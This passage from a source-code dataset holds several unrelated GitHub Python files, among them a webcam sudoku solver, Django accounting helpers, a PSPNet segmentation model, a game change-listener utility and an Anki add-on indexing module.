cv2.putText(frame, f\"Solving sudoku took: {solving_time:.4f} seconds\", (int(frame_width*0.05), int(frame_height*0.1)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n return frame\n\n###########################################################\n\n\n# class DetectionResult:\n# def __init__(self, grid, solution, corners, confidence):\n# self.grid = grid\n# self.solution = solution\n# self.corners = corners\n# self.confidence = confidence\n\n# class DetectionBuffer:\n# def __init__(self, maxlen=15, confidence_threshold=0.8):\n# self.buffer = deque(maxlen=maxlen)\n# self.confidence_threshold = confidence_threshold\n\n# def update(self, corners_detected, grid, solution):\n# # calculate the confidence score\n# grid, solution = np.array(grid), np.array(solution)\n# confidence = self.calculate_confidence(corners_detected, grid, solution)\n# result = DetectionResult(grid, solution, corners_detected, confidence)\n\n# self.buffer.append(result)\n\n# def calculate_confidence(self, corners_detected, grid, solution):\n# if solution is None:\n# return 0\n# # List of conditions and their corresponding scores\n# conditions = [\n# # (corners_detected, 1), # If corners are detected\n# (solution is not None and np.all(solution != 0), 1), # If solution is available and does not contain any 0s\n# (all(np.array_equal(solution, result.solution) for result in self.buffer), 1), # If the solution is the same as the 
last N solutions\n# (all(np.mean(grid == result.grid) > 0.5 for result in self.buffer), 1), # If the majority of unsolved grid is the same in the last N detections\n# ]\n\n# # Calculate the total score\n# score = sum(score for condition, score in conditions if condition)\n\n# # Normalize the score to get a confidence between 0 and 1\n# confidence = score / len(conditions)\n# return confidence\n# def get_average_confidence(self):\n# # calculating the average grid, solution, confidence\n# grids = [result.grid for result in self.buffer]\n# average_grid = np.mean(grids, axis=0)\n\n# solutions = [result.solution for result in self.buffer if result.solution is not None]\n# if solutions: # Check if solutions list is not empty\n# solutions = np.array(solutions)\n# average_solution = np.mean(solutions, axis=0)\n# else:\n# average_solution = None\n\n# average_confidence = sum(result.confidence for result in self.buffer) / len(self.buffer)\n\n# return average_grid, average_solution, average_confidence\n\n\n# # def get_average_confidence(self):\n# # average_grid = np.mean([result.grid for result in self.buffer], axis=0)\n# # # Get the list of solutions that are not None\n# # solutions = [result.solution for result in self.buffer if result.solution is not None]\n# # # If there are no solutions, return None for the average solution and confidence\n# # if not solutions:\n# # return None, None, None\n# # # Otherwise, calculate the average solution and confidence\n# # average_solution = np.mean(solutions, axis=0)\n# # average_confidence = sum(result.confidence for result in self.buffer if result.confidence is not None) / len(self.buffer)\n# # return average_grid, average_solution, average_confidence\n\n\n# def should_display(self) -> bool:\n# _, _, average_confidence = self.get_average_confidence()\n# print(f\"Average confidence: {average_confidence}\")\n# return average_confidence > self.confidence_threshold\n\n\nclass GoodDetections:\n def __init__(self, maxlen=15):\n self.buffer = deque(maxlen=maxlen)\n\n def update(self, corners_detected, grid, solution):\n if corners_detected and solution is not None and np.all(solution != 0):\n # This is a good detection\n self.buffer.append((corners_detected, grid, solution))\n\n def get_last_good_detection(self):\n if self.buffer:\n # Return the most recent good detection\n return self.buffer[-1]\n else:\n # No good detections have been stored yet\n return None, None, None\n\n\n###########################################################\n\nsolver = SudokuSolver()\n\nmodelson = \"./last_model.pt\"\n# print(f\"{fps} frames\")\n\n\nfps = cap.get(cv2.CAP_PROP_FPS)\n# buffer = DetectionBuffer(maxlen=int(fps*2))\ngood_detections = GoodDetections(maxlen=int(fps*0.5))\nmodel = load_model(modelson)\nKSIZE = 15\nwhile True:#cap.isOpened():\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n ret, frame = cap.read()\n\n if not ret:\n print('no video')\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n continue\n # frame = cv2.imread(\"sudokuu.jpg\")\n\n start = time.perf_counter()\n\n\n preprocessed_frame = preprocess(frame)\n corners = find_contours(preprocessed_frame,frame)\n\n if corners:\n warped = warp_image(frame, corners)\n preprocessed_warped = preprocess(warped)\n\n\n vertical_lines, horizontal_lines = get_grid_lines(preprocessed_warped)\n mask = create_grid_mask(vertical_lines, horizontal_lines)\n numbers = cv2.bitwise_and(preprocessed_warped, mask)\n\n \n cells = split_into_cells(numbers)\n cells_processed = clean_cells(cells)\n detect_time = time.perf_counter()\n preds = 
recognize_digits(cells_processed, model)\n\n end = time.perf_counter()\n sudoku_time = time.perf_counter()\n board = solver.solve(preds)#sudoku_solver(preds)\n\n good_detections.update(corners, preds, board)\n corners, grid, solution = good_detections.get_last_good_detection()\n \n end2 = time.perf_counter()\n solve_time = (end2 - sudoku_time)\n predict_time = end - start\n \n if solution is not None:\n # We have a good detection to display\n empty_cells = empty_cell_digits(grid, solution)\n warped_with_digits = draw_digits(warped, empty_cells)\n cv2.imshow(\"digited warped\", warped_with_digits)\n\n frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n cv2.imshow(\"Original\", frame)\n \n\n\n\n\n\n\n # # buffer.update(corners, preds, board)\n\n \n # # if buffer.should_display():\n # # average_grid, average_solution, average_confidence = buffer.get_average_confidence()\n # # if average_solution is not None:\n # # average_solution = average_solution.tolist()\n # # empty_cells = empty_cell_digits(preds, average_solution)\n # # else:\n # # empty_cells = empty_cell_digits(preds, board)\n\n # # else:\n # # empty_cells = empty_cell_digits(preds, board)\n \n # # if empty_cells is not None:\n # # warped_with_digits = draw_digits(warped, empty_cells)\n # # cv2.imshow(\"digit warp\", warped_with_digits)\n # # frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n\n\n\n\n\n\n\n\n \n if type(board)==list:#and 0 not in board:\n empty_cells = empty_cell_digits(preds, board)\n warped_with_digits = draw_digits(warped, empty_cells)\n cv2.imshow(\"digited warped\", warped_with_digits)\n\n frame = unwarp_image(warped_with_digits, frame, corners, predict_time, solve_time)\n \n # cv2.imshow(\"Overlayed\", result)\n # frame = result\n\n\n\n \n \n\n\n\n\n cv2.imshow(\"Warped screen\", warped,)\n \n \n\n cv2.imshow(\"Original\", frame)\n\n # break\n\n\n\ncv2.waitKey(0)\ncap.release()\ncv2.destroyAllWindows()","repo_name":"mehmet-nabi-duru/pytorch-sudoku-solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16475027361","text":"import pandas as pd\n\nfrom datapackage_utilities import building\n\ndf = pd.read_csv('archive/demand.csv')\n\n# set the names\ndf['name'] = df['bus'].apply(lambda row: row + '-electricity-load')\n\n# set the profile names\ndf['profile'] = df['bus'].apply(lambda row: 'el-profile-' + row)\n\n# necessary\ndf.set_index('name', inplace=True)\n\ndf_seq = pd.read_csv('archive/load_profile.csv', parse_dates=True, index_col=0)\n\nbuilding.write_sequences('load_profile.csv', df_seq)\n\nbuilding.write_elements('load.csv', df)\n","repo_name":"ZNES-datapackages/100-sea-2050","sub_path":"scripts/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2428119050","text":"from django.db.models import Q\n\n\nclass OrganizationManager(object):\n selected_organization_key = 'selected_organization_pk'\n\n def get_user_organizations(self, user):\n # To avoid circular imports\n from .models import Organization\n\n orgas = (Organization.objects\n .filter(Q(members=user) | Q(owner=user))\n .distinct())\n return orgas\n\n def set_selected_organization(self, request, organization):\n key = self.selected_organization_key\n request.session[key] = organization.pk\n\n def 
get_selected_organization(self, request):\n key = self.selected_organization_key\n if key not in request.session:\n return\n\n # To avoid circular imports\n from .models import Organization\n\n pk = request.session[key]\n organization = Organization.objects.get(pk=pk)\n return organization\n\n\norganization_manager = OrganizationManager()\n\n\nclass BaseNumberGenerator(object):\n \"\"\"\n Simple object for generating sale numbers.\n \"\"\"\n\n def next_number(self, organization):\n raise NotImplementedError\n\n\nclass EstimateNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.estimates.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass InvoiceNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.invoices.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass BillNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.bills.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n\n\nclass ExpenseClaimNumberGenerator(BaseNumberGenerator):\n\n def next_number(self, organization):\n last = organization.expense_claims.all().order_by('-number').first()\n if last is not None:\n last_number = int(last.number)\n else:\n last_number = 0\n return last_number + 1\n","repo_name":"dulacp/django-accounting","sub_path":"accounting/apps/books/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"51"} +{"seq_id":"6749550208","text":"from django.template import Library, Node\nfrom ribo_api.services.utils import Utils\n\nregister = Library()\n\n\ndef do_email_tag(parser, token):\n tag = token.contents\n nodelist = parser.parse(('end%s' % tag,))\n parser.delete_first_token()\n return EmailNode(tag, nodelist)\n\n\nclass EmailNode(Node):\n def __init__(self, tag, nodelist):\n self.tag = tag\n self.nodelist = nodelist\n\n def render(self, context):\n context_var = '_%s' % self.tag\n if not context.get(context_var, False):\n return ''\n return self.nodelist.render(context)\n\n\ndef gen_loc_slug(loc, arg=None):\n return Utils.gen_search_slug('', loc.display_text)\n\n\nregister.filter('gen_loc_slug', gen_loc_slug)\nregister.tag('subject', do_email_tag)\nregister.tag('body', do_email_tag)\nregister.tag('bodyhtml', do_email_tag)\n\ncss = [\n 'background-color: #0090de; border: solid 2px #A0DEFF;',\n 'background-color: #845bf0; border: solid 2px #CAB6FF;',\n 'background-color: #5fc67c; border: solid 2px #8DF7AA;',\n 'background-color: #efa23d; border: solid 2px #FFC77F;',\n 'background-color: #ea5d5d; border: solid 2px #FFD2D2;',\n]\n\n\n@register.filter(name='gid2colorcode')\ndef gid2colorcode(value):\n index = value % 5;\n style = '\" style=\"width: 38px; height: 38px; vertical-align: middle; text-align: center; border-radius: 50%;'\n style += css[index]\n return style\n","repo_name":"RinPham/RiBo-Core","sub_path":"src/template_email/templatetags/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"39230111225","text":"import RPi.GPIO as GPIO\nimport 
time\n\npin = 12\n\nGPIO.setmode(GPIO.BCM)\n#GPIO.setup(pin, GPIO.IN)\nGPIO.setup(pin, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n\ncount = 0\n\ntry:\n while True:\n input_state = GPIO.input(pin)\n if input_state == True:\n count += 1\n print (str(count) + ' pressed')\n time.sleep(0.2)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n\n\n","repo_name":"jinwon-C/RaspberryPi","sub_path":"switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26303620118","text":"import logging\nimport traceback\n\nfrom horizons.util.python.callback import Callback\nfrom horizons.util.python.weakmethodlist import WeakMethodList\n\n\nclass ChangeListener:\n\t\"\"\"Trivial ChangeListener.\n\tThe object that changes and the object that listens have to inherit from this class.\n\tAn object calls _changed every time something has changed, obviously.\n\tThis function calls every Callback, that has been registered to listen for a change.\n\tNOTE: ChangeListeners aren't saved, they have to be reregistered on load\n\tNOTE: RemoveListeners must not access the object, as it is in progress of being destroyed.\n\t\"\"\"\n\n\tlog = logging.getLogger('changelistener')\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__() #TODO: check if this call is needed\n\t\tself.__init()\n\n\tdef __init(self):\n\t\tself.__listeners = WeakMethodList()\n\t\tself.__remove_listeners = WeakMethodList()\n\t\t# number of event calls\n\t\t# if any event is triggered increase the number, after all callbacks are executed decrease it\n\t\t# if it reaches 0 it means that in the current object all event callbacks were executed\n\t\tself.__event_call_number = 0\n\t\tself.__hard_remove = True\n\n\tdef __remove_listener(self, listener_list, listener):\n\t\t# check if the listener should be hard removed\n\t\t# if so switch it in the list to None\n\t\ttry:\n\t\t\tif self.__hard_remove:\n\t\t\t\tlistener_list.remove(listener)\n\t\t\telse:\n\t\t\t\tlistener_list[listener_list.index(listener)] = None\n\t\texcept ValueError as e: # nicer error:\n\t\t\traise ValueError(str(e) +\n\t\t\t \"\\nTried to remove: \" + str(listener) + \"\\nat \" + str(self) +\n\t\t\t \"\\nList: \" + str([str(i) for i in listener_list]))\n\n\tdef __call_listeners(self, listener_list):\n\t\t# instead of removing from list, switch the listener in position to None\n\t\t# this way, iteration won't be affected while listeners may modify the list\n\t\tself.__hard_remove = False\n\t\t# increase the event call number\n\t\tself.__event_call_number += 1\n\t\tfor listener in listener_list:\n\t\t\tif listener:\n\t\t\t\ttry:\n\t\t\t\t\tlistener()\n\t\t\t\texcept ReferenceError as e:\n\t\t\t\t\t# listener object is dead, don't crash since it doesn't need updates now anyway\n\t\t\t\t\tself.log.warning('The dead are listening to %s: %s', self, e)\n\t\t\t\t\ttraceback.print_stack()\n\n\t\tself.__event_call_number -= 1\n\n\t\tif self.__event_call_number == 0:\n\t\t\tself.__hard_remove = True\n\t\t\tlistener_list[:] = [l for l in listener_list if l]\n\n\t## Normal change listener\n\tdef add_change_listener(self, listener, call_listener_now=False, no_duplicates=False):\n\t\tassert callable(listener)\n\t\tif not no_duplicates or listener not in self.__listeners:\n\t\t\tself.__listeners.append(listener)\n\t\tif call_listener_now: # also call if duplicate is added\n\t\t\tlistener()\n\n\tdef remove_change_listener(self, 
listener):\n\t\tself.__remove_listener(self.__listeners, listener)\n\n\tdef has_change_listener(self, listener):\n\t\treturn (listener in self.__listeners)\n\n\tdef discard_change_listener(self, listener):\n\t\t\"\"\"Remove listener if it's there\"\"\"\n\t\tif self.has_change_listener(listener):\n\t\t\tself.remove_change_listener(listener)\n\n\tdef clear_change_listeners(self):\n\t\t\"\"\"Removes all change listeners\"\"\"\n\t\tself.__listeners = WeakMethodList()\n\n\tdef _changed(self):\n\t\t\"\"\"Calls every listener when an object changed\"\"\"\n\t\tself.__call_listeners(self.__listeners)\n\n\t## Removal change listener\n\tdef add_remove_listener(self, listener, no_duplicates=False):\n\t\t\"\"\"A listener that listens for removal of the object\"\"\"\n\t\tassert callable(listener)\n\t\tif no_duplicates and listener in self.__remove_listeners:\n\t\t\treturn # don't allow duplicate entries\n\t\tself.__remove_listeners.append(listener)\n\n\tdef remove_remove_listener(self, listener):\n\t\tself.__remove_listener(self.__remove_listeners, listener)\n\n\tdef has_remove_listener(self, listener):\n\t\treturn (listener in self.__remove_listeners)\n\n\tdef discard_remove_listener(self, listener):\n\t\tif self.has_remove_listener(listener):\n\t\t\tself.remove_remove_listener(listener)\n\n\tdef load(self, db, world_id):\n\t\tself.__init()\n\n\tdef remove(self):\n\t\tself.__call_listeners(self.__remove_listeners)\n\t\tself.end()\n\n\tdef end(self):\n\t\tself.__listeners = None\n\t\tself.__remove_listeners = None\n\n\n\"\"\" Class decorator that adds methods for listening for certain events to a class.\nThese methods get added automatically (eventname is the name you pass to the decorator):\n- add_eventname_listener(listener):\n Adds listener callback. This function must take the object as first parameter plus\n\t\tany parameter that might be provided additionally to on_eventname.\n- remove_eventname_listener(listener);\n Removes a listener previously added.\n- has_eventname_listener(listener)\n Checks if a certain listener has been added.\n- on_eventname\n This is used to call the callbacks when the event occurred.\n Additional parameters may be provided, which are passed to the callback.\n\nThe goal is to simplify adding special listeners, as for example used in the\nproduction_finished listener.\n\"\"\"\n\n\ndef metaChangeListenerDecorator(event_name):\n\tdef decorator(clas):\n\t\tlist_name = \"__\" + event_name + \"_listeners\"\n\t\tevent_call_number = \"__\" + event_name + \"call_number\"\n\t\thard_remove_event = \"__hard_remove\" + event_name\n\n\t\t# trivial changelistener operations\n\t\tdef add(self, listener):\n\t\t\tassert callable(listener)\n\t\t\tgetattr(self, list_name).append(listener)\n\n\t\tdef rem(self, listener):\n\t\t\tif getattr(self, hard_remove_event):\n\t\t\t\tgetattr(self, list_name).remove(listener)\n\t\t\telse:\n\t\t\t\tlistener_list = getattr(self, list_name)\n\t\t\t\tlistener_list[listener_list.index(listener)] = None\n\n\t\tdef has(self, listener):\n\t\t\treturn listener in getattr(self, list_name)\n\n\t\tdef on(self, *args, **kwargs):\n\t\t\tsetattr(self, hard_remove_event, False)\n\t\t\tcall_number = getattr(self, event_call_number) + 1\n\t\t\tsetattr(self, event_call_number, call_number)\n\t\t\tfor f in getattr(self, list_name):\n\t\t\t\tif f:\n\t\t\t\t\t# workaround for encapsuled arguments\n\t\t\t\t\tif isinstance(f, Callback):\n\t\t\t\t\t\tf()\n\t\t\t\t\telse:\n\t\t\t\t\t\tf(self, *args, **kwargs)\n\n\t\t\tcall_number = getattr(self, event_call_number) - 
1\n\t\t\tsetattr(self, event_call_number, call_number)\n\t\t\tif getattr(self, event_call_number) == 0:\n\t\t\t\tsetattr(self, hard_remove_event, True)\n\t\t\t\tsetattr(self, list_name, [l for l in getattr(self, list_name) if l])\n\n\t\t# add methods to class\n\t\tsetattr(clas, \"add_\" + event_name + \"_listener\", add)\n\t\tsetattr(clas, \"remove_\" + event_name + \"_listener\", rem)\n\t\tsetattr(clas, \"has_\" + event_name + \"_listener\", has)\n\t\tsetattr(clas, \"on_\" + event_name, on)\n\n\t\t# use black __new__ magic to add the methods to the instances\n\t\t# think of it as being executed in __init__\n\t\told_new = clas.__new__\n\n\t\tdef new(cls, *args, **kwargs):\n\t\t\t# this is a proposed way of calling the \"old\" new:\n\t\t\t#obj = super(cls, cls).__new__(cls)\n\t\t\t# which results in endless recursion, if you construct an instance of a class,\n\t\t\t# that inherits from a base class on which the decorator has been applied.\n\t\t\t# therefore, this workaround is used:\n\t\t\tobj = old_new(cls)\n\t\t\tsetattr(obj, list_name, [])\n\t\t\tsetattr(obj, event_call_number, 0)\n\t\t\tsetattr(obj, hard_remove_event, True)\n\t\t\treturn obj\n\t\tclas.__new__ = staticmethod(new)\n\t\treturn clas\n\treturn decorator\n","repo_name":"unknown-horizons/unknown-horizons","sub_path":"horizons/util/changelistener.py","file_name":"changelistener.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"51"} +{"seq_id":"74613606878","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nimport neural_net.extractors as extractors\n\n# This code (both pspnet.py and extractors.py) is a modification of the one developed here https://github.com/Lextal/pspnet-pytorch\n\nclass PSPModule(nn.Module):\n \"\"\"\n This is the core class of PSP (encoder part).\n it applies in parallel different pooling layers (1,2,3,6), each followed by 1x1 convolution.\n Their output is concatenated along depth, also adding the original features,\n and transformed again with a convolution.\n \"\"\"\n\n def __init__(self, features, out_features=1024, sizes=(1, 2, 3, 6)):\n \"\"\"\n @param features: depth of the input tensor\n @param out_features: depth of the output tensor (i.e., number of filters)\n @param sizes: list of the different pooling kernel sizes you want to apply (Pyramid pooling)\n \"\"\"\n super().__init__()\n self.stages = []\n # For each pyramid kernel size, create a stage (i.e., pyramid-pooling + convolution)\n self.stages = nn.ModuleList([self._make_stage(features, size) for size in sizes])\n # This stage applies convolution to the concatenation of the results of pyramid kernels (stages)\n # concatenation of input tensors is made along the depth layer: features * (len(sizes) + 1)\n self.bottleneck = nn.Conv2d(features * (len(sizes) + 1), out_features, kernel_size=1)\n self.relu = nn.ReLU()\n\n def _make_stage(self, features, size):\n \"\"\"\n Applies down-pooling with specified kernel size, followed by 1x1 convolution\n @param features: number of input features = number of output features\n @param size: kernel size for pooling\n \"\"\"\n prior = nn.AdaptiveAvgPool2d(output_size=(size, size)) # Pooling with specified kernel size\n conv = nn.Conv2d(features, features, kernel_size=1, bias=False) # 1x1 convolution\n return nn.Sequential(prior, conv)\n\n def forward(self, feats):\n \"\"\"\n Run the CNN module.\n @param feats: input tensor\n \"\"\"\n h, w = feats.size(2), feats.size(3)\n\n # 1. 
Apply the stages with different pooling sizes\n # 2. upsample their output to the original width/height (bilinear)\n # 3. also use the original features (feats) as input for the next stage\n priors = [F.interpolate(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]\n\n # 1. Concatenate the stage outputs and the original features\n # 2. Apply convolution\n bottle = self.bottleneck(torch.cat(priors, 1))\n return self.relu(bottle)\n\n\nclass PSPUpsample(nn.Module):\n \"\"\"\n Base module for building the decoder\n \"\"\"\n def __init__(self, in_channels, out_channels):\n \"\"\"\n Create upsample module (size * 2).\n @param in_channels: depth of the input tensor\n @param out_channels: depth of the output tensor\n \"\"\"\n super().__init__()\n self.conv = nn.Sequential(\n # 3x3 convolution\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.PReLU()\n )\n\n def forward(self, x):\n \"\"\"\n @param x: input tensor\n \"\"\"\n # Double the size of the input tensor with bilinear filter\n h, w = 2 * x.size(2), 2 * x.size(3)\n p = F.interpolate(input=x, size=(h, w), mode='bilinear', align_corners=True)\n # Apply a convolutional layer\n return self.conv(p)\n\n\nclass PSPNet(nn.Module):\n \"\"\"\n Pyramid scene parsing neural network.\n \"\"\"\n def __init__(self, output_type, n_channels=3, regr_range=4, sizes=(1, 2, 3, 6), feature_size=512, backend='resnet34', pretrained=False):\n \"\"\"\n @param output_type: 'regr' if your output is regression ([0,4] range). For classification, it should provide the number of classes.\n @param n_channels: number of input channels for the images\n @param regr_range: None for classification, int to specify output regression range -> [0, regr_range]\n Regression output is Sigmoid(x)*regr_range\n @param sizes: list of pyramid pooling kernel sizes\n @param feature_size: depth of the feature extraction layer\n @param backend: name of the backend for feature extraction (e.g., resnet18, resnet34, resnet50, resnet101, resnet152)\n @param pretrained: True if you want to use pretrained backend\n \"\"\"\n super().__init__()\n\n self.pretrained = pretrained\n self.regr_range = regr_range\n\n # 1. Select Feature extraction layer: from input image to features-tensor\n # pretrained: whether the feature extraction module is pretrained\n # input_depth: specifies the number of channels\n self.feats = getattr(extractors, backend)(pretrained, n_channels)\n\n # 2. Main module with the pyramid pooling layers (applied to extracted features)\n# psp_size = 2048 # output size of resnet --> TODO: this used to be hard-coded this way, but like that it raises an error\n# psp_size = 512 # output size of resnet\n self.psp = PSPModule(feature_size, feature_size//2, sizes) # From psp_size to 1024 channels\n self.drop_1 = nn.Dropout2d(p=0.3)\n\n # 3. Add three upsample layers, with decreasing depth (from original 1024 to 64)\n self.up_1 = PSPUpsample(feature_size//2, feature_size//4)\n self.up_2 = PSPUpsample(feature_size//4, feature_size//8)\n self.up_3 = PSPUpsample(feature_size//8, feature_size//8)\n\n self.drop_2 = nn.Dropout2d(p=0.15)\n\n # 4. 
Final convolutional layer (1x1) from 64 depth to n_classes (output probabilities)\n # Regression or single-class classification -> use sigmoid\n self.output_type = output_type\n if output_type=='regr' or output_type==1:\n self.final = nn.Sequential(\n nn.Conv2d(feature_size//8, 1, kernel_size=1), # output depth is 1 (just regression)\n nn.Sigmoid()\n )\n # Multi class classification -> use softmax\n elif type(output_type) is int and self.output_type>1:\n self.final = nn.Sequential(\n nn.Conv2d(feature_size//8, output_type, kernel_size=1), # final number of classes\n # Applies log-softmax over the class dimension\n nn.LogSoftmax(dim=1)\n )\n\n\n # TODO: this looks useless to me; it seems to be a \"baseline\" classifier for comparison against the pspnet\n # self.classifier = nn.Sequential(\n # nn.Linear(deep_features_size, 256),\n # nn.ReLU(),\n # nn.Linear(256, n_classes)\n # )\n\n def forward(self, x):\n f, class_f = self.feats(x) # Extract the 2048 features\n p = self.psp(f) # Apply pyramid modules\n p = self.drop_1(p) # dropout\n\n p = self.up_1(p) # upsampling1\n p = self.drop_2(p)\n\n p = self.up_2(p) # upsampling2\n p = self.drop_2(p)\n\n p = self.up_3(p) # upsampling3\n p = self.drop_2(p)\n\n auxiliary = F.adaptive_max_pool2d(input=class_f, output_size=(1, 1)).view(-1, class_f.size(1))\n\n # final convolution\n if self.output_type=='regr': # Regression for Satellite images [0, regr_range]\n return self.regr_range * self.final(p)\n else:\n return self.final(p) # Softmax/sigmoid output (classification)\n\n # TODO: I removed classifier 2, which in my opinion is useless\n # return self.final(p), self.classifier(auxiliary)\n\n def initialize_weights(self, seed):\n \"\"\"\n Initialization of model weights ()\n \"\"\"\n pass","repo_name":"dbdmg/rescue","sub_path":"neural_net/pspnet.py","file_name":"pspnet.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"35029318461","text":"from aqt import mw\nfrom aqt.qt import *\nfrom anki.find import Finder\nimport aqt\nimport time\nimport os\nfrom .state import checkIndex, get_index, set_index, set_corpus, get_corpus, corpus_is_loaded, get_edit\nfrom .logging import *\nfrom .web import loadSynonyms, showSearchResultArea, printStartingInfo\nfrom .fts_index import FTSIndex\nfrom .whoosh_index import WhooshSearchIndex\n\ndef get_notes_in_collection(): \n \"\"\"\n Reads the collection and builds a list of tuples (note id, note fields as string, note tags, deck id, model id)\n \"\"\"\n config = mw.addonManager.getConfig(__name__)\n deckList = config['decks']\n deckStr = \"\"\n for d in list(mw.col.decks.decks.values()):\n if d['name'] in deckList:\n deckStr += str(d['id']) + \",\"\n if len(deckStr) > 0:\n deckStr = \"(%s)\" %(deckStr[:-1])\n \n if deckStr:\n oList = mw.col.db.execute(\"select distinct notes.id, flds, tags, did, mid from notes left join cards on notes.id = cards.nid where did in %s\" %(deckStr))\n else:\n oList = mw.col.db.execute(\"select distinct notes.id, flds, tags, did, mid from notes left join cards on notes.id = cards.nid\")\n uList = list()\n for id, flds, t, did, mid in oList:\n uList.append((id, flds, t, did, str(mid)))\n return uList\n\ndef build_index(force_rebuild = False, execute_after_end = None):\n config = mw.addonManager.getConfig(__name__)\n if get_index() is None:\n if not corpus_is_loaded():\n corpus = get_notes_in_collection()\n set_corpus(corpus)\n #check if we have to rebuild the index\n index_already_there = not force_rebuild and not _should_rebuild()\n 
#build index in background to prevent ui from freezing\n p = ProcessRunnable(_build_index, index_already_there)\n if execute_after_end is not None:\n p.after_end = execute_after_end\n p.start()\n\ndef _build_index(index_up_to_date):\n\n \"\"\"\n Builds the index. Result is stored in global var searchIndex.\n The index.type is either \"Whoosh\"/\"SQLite FTS3\"/\"SQLite FTS4\"/\"SQLite FTS5\"\n \"\"\"\n start = time.time()\n config = mw.addonManager.getConfig(__name__)\n try:\n useFTS = config['useFTS'] \n except KeyError:\n useFTS = False\n searchIndex = None\n corpus = get_corpus()\n #fts4 based sqlite reversed index\n if config[\"disableNonNativeSearching\"] or useFTS:\n searchIndex = FTSIndex(corpus, config[\"disableNonNativeSearching\"], index_up_to_date)\n end = time.time()\n initializationTime = round(end - start)\n #whoosh index\n else:\n searchIndex = WhooshSearchIndex(corpus, config[\"disableNonNativeSearching\"], index_up_to_date)\n end = time.time()\n initializationTime = round(end - start)\n \n\n searchIndex.finder = Finder(mw.col)\n searchIndex.output.stopwords = searchIndex.stopWords\n searchIndex.output.fields_to_hide_in_results = config[\"fieldsToHideInResults\"]\n searchIndex.selectedDecks = []\n searchIndex.lastSearch = None\n searchIndex.lastResDict = None\n searchIndex.tagSearch = True\n searchIndex.tagSelect = False\n searchIndex.topToggled = True\n searchIndex.output.edited = {}\n searchIndex.initializationTime = initializationTime\n searchIndex.synonyms = loadSynonyms()\n searchIndex.logging = config[\"logging\"]\n try:\n limit = config['numberOfResults']\n if limit <= 0:\n limit = 1\n elif limit > 5000:\n limit = 5000\n except KeyError:\n limit = 500\n searchIndex.limit = limit\n\n try:\n showRetentionScores = config[\"showRetentionScores\"]\n except KeyError:\n showRetentionScores = True\n searchIndex.output.showRetentionScores = showRetentionScores\n try:\n hideSidebar = config[\"hideSidebar\"]\n except KeyError:\n hideSidebar = False\n searchIndex.output.hideSidebar = hideSidebar\n\n if searchIndex.logging:\n log(\"\\n--------------------\\nInitialized searchIndex:\")\n log(\"\"\"Type: %s\\n# Stopwords: %s \\n# Synonyms: %s \\nLimit: %s \\n\"\"\" % (searchIndex.type, len(searchIndex.stopWords), len(searchIndex.synonyms), limit))\n\n editor = aqt.mw.app.activeWindow().editor if hasattr(aqt.mw.app.activeWindow(), \"editor\") else None\n if editor is not None and editor.addMode:\n searchIndex.output.editor = editor\n set_index(searchIndex)\n editor = editor if editor is not None else get_edit() \n showSearchResultArea(editor, initializationTime=initializationTime)\n printStartingInfo(editor)\n \n\ndef _should_rebuild():\n \"\"\"\n Check if the index has to be rebuilt.\n \"\"\"\n\n info = get_index_info()\n corpus = get_corpus() \n config = mw.addonManager.getConfig(__name__)\n\n # if the index type changed, rebuild\n if (info[\"type\"] == \"Whoosh\" and config[\"useFTS\"]) or (info[\"type\"] != \"Whoosh\" and not config[\"useFTS\"]):\n return True\n\n # not used atm, so always false\n if info[\"shouldRebuild\"]:\n toggle_should_rebuild()\n return True\n\n #if db file / index dir is not existing, rebuild\n if config[\"useFTS\"]:\n file_path = os.path.dirname(os.path.realpath(__file__)).replace(\"\\\\\", \"/\").replace(\"/indexing.py\", \"\") + \"/search-data.db\"\n if not os.path.isfile(file_path):\n return True\n else:\n file_path = os.path.dirname(os.path.realpath(__file__)).replace(\"\\\\\", \"/\").replace(\"/indexing.py\", \"\") + \"/index\"\n if not 
